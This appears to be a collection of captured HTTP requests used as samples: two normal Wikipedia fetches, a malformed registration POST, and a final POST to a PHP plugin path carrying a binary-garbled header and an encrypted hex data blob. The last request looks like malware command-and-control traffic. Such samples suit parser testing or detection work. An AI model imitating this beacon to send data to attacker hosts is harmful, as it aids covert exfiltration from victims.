GET /static/favicon/wikipedia.ico HTTP/1.1
Host: pl.wikipedia.org:443
Accept: */*
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Referer: https://pl.wikipedia.org/wiki/Wikipedia:Strona_g%C5%82%C3%B3wna
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36

=====
GET /wikipedia/commons/thumb/4/48/Padlock-red.svg/22px-Padlock-red.svg.png HTTP/1.1
Host: upload.wikimedia.org:443
Accept: image/webp,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Referer: https://pl.wikipedia.org/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36

=====
POST /registration.html HTTP/0.9
Host: suna.e-sim.org
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Content-Type: application/x-www-form-urlencoded
Origin: http://suna.e-sim.org
Referer: http://suna.e-sim.org/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36

user=asd&pass=asd
=====
POST /plugins/phsys.php HTTP/1.1
Accept: , \x08\xba\x16, , , , , , , , , , , , , , , , , , , ,
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3 rv:11.0) like Gecko
Host: exaltation.info
Content-Length: 645
Cache-Control: no-cache

data=5A18B30CFCDA6B5D347FC82E071717C65A2E29518F746DC9FC1514A25AAB26B64D95AF
CDD69ACFCB79CE26341F55BFEA3377FBCE8E6AF37374167724FAE23F7CF4E00792E81332E96
3C37981934916094CF384F97A4F33A738B6003A17CB769F9E9EA945BCA0C0DB6CD2799AB7B0
27C370E6B88E1CEF30C090130D051FD616C6FDD382AE15F85100633FB5E3BF3815D
=====
